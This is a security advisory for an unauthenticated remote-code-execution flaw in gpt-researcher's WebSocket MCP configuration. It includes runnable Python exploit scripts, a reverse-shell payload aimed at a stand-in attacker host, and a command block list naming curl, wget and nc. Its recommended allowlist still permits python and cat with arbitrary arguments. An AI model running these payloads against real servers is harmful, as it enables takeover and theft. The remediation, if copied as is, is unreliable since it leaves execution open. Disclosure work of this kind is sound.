# Vulnerability Summary: Unauthenticated Remote Code Execution (RCE) in gpt-researcher

## Vulnerability Overview

* **Vulnerability Name**: Unauthenticated Remote Code Execution via MCP Command Injection in gpt-researcher #1694
* **Affected Versions**: GPT Researcher v3.4.3 and earlier
* **Vulnerability Type**: Unauthenticated Remote Code Execution (RCE) / MCP Command Injection
* **CVSS Score**: 10.0 (Critical)
* **Description**: An attacker can send a message containing the `mcp_config` parameter to the WebSocket `/ws` endpoint. This parameter accepts an arbitrary `command` and an `args` array. Neither value is validated or sanitized as it passes through the application, and both eventually reach `anyio.open_process()`, which spawns the attacker-specified process on the server. No authentication is required, so the attacker fully controls the executed command, its arguments, and its environment variables.

## Impact Scope

1. **Full Remote Code Execution**: Attackers can execute arbitrary commands on the server, including reading and writing files, installing malware, moving laterally to other systems, and exfiltrating data.
2. **No Authentication Required**: The WebSocket endpoint performs no authentication; anyone who can reach it over the network can connect and send attack payloads.
3. **Environment Variable Control**: Attackers control the `env` parameter, enabling further attacks such as `LD_PRELOAD` injection, `PATH` hijacking, or credential injection.
4. **Cross-Site Exploitation**: Combined with a Cross-Site WebSocket Hijacking vulnerability (no Origin validation), this RCE can be triggered from a malicious webpage opened by a user on the same network.

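
Items 3 and 4 of the impact scope both come down to a missing check. As a minimal sketch of what those checks could look like (not code from gpt-researcher), the two helpers below validate a WebSocket `Origin` header against an exact allowlist and drop loader-related variables from a client-supplied `env` mapping. The names `TRUSTED_ORIGINS`, `DANGEROUS_ENV_KEYS`, `is_trusted_origin`, and `strip_dangerous_env`, as well as the origin values, are assumptions chosen for illustration.

```python
from urllib.parse import urlsplit

# Hypothetical allowlist of front-end origins; adjust to the real deployment.
TRUSTED_ORIGINS = {"http://localhost:3000", "http://127.0.0.1:3000"}

# Variables that change how a child process loads code or resolves binaries.
# Illustrative, not exhaustive.
DANGEROUS_ENV_KEYS = {"LD_PRELOAD", "LD_LIBRARY_PATH", "PATH", "PYTHONPATH"}


def is_trusted_origin(origin):
    """Return True only if the Origin header exactly matches an allowlisted origin."""
    if not origin:
        return False
    parts = urlsplit(origin)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        return False
    # Compare scheme://host[:port] as a whole; no prefix or substring matching.
    normalized = f"{parts.scheme}://{parts.netloc}".lower()
    return normalized in TRUSTED_ORIGINS


def strip_dangerous_env(env):
    """Return a copy of env without keys listed in DANGEROUS_ENV_KEYS."""
    return {k: v for k, v in env.items() if k.upper() not in DANGEROUS_ENV_KEYS}
```

Exact matching matters here: a prefix check would accept an origin such as `http://localhost:3000.evil.example`. Filtering `env` reduces the attack surface but is not a substitute for refusing client-supplied process configuration altogether.
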
## Proof of Concept (PoC)

**PoC 1: Create a File on the Server (Minimal PoC)**

```python
import asyncio
import json

import websockets


async def rce_poc():
    async with websockets.connect('ws://target:8888/ws') as ws:
        payload = json.dumps({
            'task': 'test',
            'report_type': 'research_report',
            'report_source': 'web',
            'source_urls': [],
            'tone': 'Objective',
            'agent': 'Auto Agent',
            'repo_name': '',
            'branch_name': '',
            'mcp_enabled': True,
            'mcp_strategy': 'fast',
            'mcp_config': [{
                'name': 'exploit',
                'command': 'touch',
                'args': ['/tmp/rce_proof_gpt_researcher']
            }]
        })
        await ws.send('start ' + payload)
        # Read up to 10 server messages; stop on timeout or when the server closes.
        for _ in range(10):
            try:
                await asyncio.wait_for(ws.recv(), timeout=15)
            except (asyncio.TimeoutError, websockets.ConnectionClosed):
                break


asyncio.run(rce_poc())
```

**PoC 2: Execute System Commands and Exfiltrate Output**

```python
import asyncio
import json

import websockets


async def rce_exfil():
    async with websockets.connect('ws://target:8888/ws') as ws:
        payload = json.dumps({
            'task': 'test',
            'report_type': 'research_report',
            'report_source': 'web',
            'source_urls': [],
            'tone': 'Objective',
            'agent': 'Auto Agent',
            'repo_name': '',
            'branch_name': '',
            'mcp_enabled': True,
            'mcp_strategy': 'fast',
            'mcp_config': [{
                'name': 'exploit',
                'command': 'bash',
                'args': ['-c', 'id > /tmp/rce_output && whoami >> /tmp/rce_output && hostname >> /tmp/rce_output']
            }]
        })
        await ws.send('start ' + payload)
        # Read up to 10 server messages; stop on timeout or when the server closes.
        for _ in range(10):
            try:
                await asyncio.wait_for(ws.recv(), timeout=15)
            except (asyncio.TimeoutError, websockets.ConnectionClosed):
                break


asyncio.run(rce_exfil())
```

**PoC 3: Reverse Shell (Conceptual)**

```json
{
  "mcp_config": [{
    "name": "shell",
    "command": "bash",
    "args": ["-c", "bash -i >& /dev/tcp/attacker.com/4444 0>&1"]
  }]
}
```

## Remediation

**Recommended Fix: Allowlist MCP Commands**

```python
# gpt_researcher/mcp/client.py
import os

ALLOWED_MCP_COMMANDS = {
    'ls': True,
    'cat': True,
    'python3': True,
    'python': True,
}

BLOCKED_COMMANDS = {
    'bash', 'sh', 'zsh', 'cmd', 'powershell', 'pwsh',
    'curl', 'wget', 'nc', 'netcat', 'socat',
    'rm', 'dd', 'mkfs', 'kill', 'chmod', 'chown',
}


def validate_mcp_command(config: dict) -> bool:
    """Validate MCP server command against allowlist."""
    command = config.get('command', '')

    # Block dangerous commands
    base_command = os.path.basename(command)
    if base_command in BLOCKED_COMMANDS:
        raise ValueError(f"MCP command '{command}' is blocked for security reasons")

    # Only allow known MCP server launchers
    if base_command not in ALLOWED_MCP_COMMANDS:
        raise ValueError(
            f"MCP command '{command}' is not in the allowed list. "
            f"Allowed commands: {', '.join(ALLOWED_MCP_COMMANDS)}"
        )

    # Validate args don't contain shell metacharacters
    args = config.get('args', [])
    for arg in args:
        if any(c in arg for c in [';', '&', '|', '$', '>', '<']):
            raise ValueError(f"MCP argument contains shell metacharacters: {arg}")

    return True


# Apply validation before processing config
def convert_configs_to_langchain_format(self, configs):
    for config in configs:
        validate_mcp_command(config)  # Validate BEFORE processing
        ...
```

**Additional Recommendations**

1. **Require Authentication**: Implement authentication to prevent anonymous access.
2. **Disable MCP by Default**: MCP should be disabled by default and require explicit server-side configuration; do not accept arbitrary configurations from the client.
3. **Sandbox MCP Processes**: Run MCP server processes within a sandboxed environment (e.g., Doc